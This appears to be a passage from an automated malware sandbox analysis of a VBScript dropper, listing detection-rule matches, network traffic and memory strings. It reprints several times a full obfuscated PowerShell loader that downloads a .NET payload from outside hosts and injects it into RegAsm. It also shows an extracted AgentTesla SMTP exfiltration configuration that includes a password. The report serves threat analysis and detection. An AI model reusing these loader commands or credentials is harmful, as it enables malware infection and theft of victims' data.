ScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydM
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", ProcessId: 2216, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydM
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", ProcessId: 2216, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydM
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnK
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:22:14.532509+020020204251Exploit Kit Activity Detected162.159.140.237443192.168.2.849705TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: RegAsm.exe.6264.9.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.detarcoopmedical.com", "Username": "mail@detarcoopmedical.com", "Password": "To$zL%?nhDHN"}
                  Source: pub-26ee9be236b54d0cb1b570a203543b93.r2.devVirustotal: Detection: 15%Perma Link
                  Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVirustotal: Detection: 10%Perma Link
                  Source: http://pub-26ee9be236b54d0cb1b570a203543b93.r2.devVirustotal: Detection: 15%Perma Link
                  Source: PofaABvatI.vbsVirustotal: Detection: 8%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.8:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.8:49705 version: TLS 1.2
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1595867471.000001A064DD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 162.159.140.237:443 -> 192.168.2.8:49705
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /mmili.txt HTTP/1.1Host: pub-26ee9be236b54d0cb1b570a203543b93.r2.devConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 162.159.140.237 162.159.140.237
                  Source: Joe Sandbox ViewIP Address: 162.159.140.237 162.159.140.237
                  Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /mmili.txt HTTP/1.1Host: pub-26ee9be236b54d0cb1b570a203543b93.r2.devConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: global trafficDNS traffic detected: DNS query: pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04DF7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05C90C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04E1CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04CCE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                  Source: wscript.exe, 00000000.00000003.1430184240.00000150A8BE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
                  Source: powershell.exe, 00000002.00000002.1608428620.000001EBC0C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04C891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04DFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04E1CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000002.00000002.1608428620.000001EBC0C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1608428620.000001EBC0C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04C891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04E1CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04D8BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04DF79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04CAB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04CAB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04CAB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtFyL;DLjbase64Content
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05C90C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04DFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04DFC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04CCE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                  Source: powershell.exe, 00000004.00000002.1557394015.000001A04CCE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/mmili.txt
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.8:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.8:49705 version: TLS 1.2

                  System Summary

                  barindex
                  Source: Process Memory Space: powershell.exe PID: 2952, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
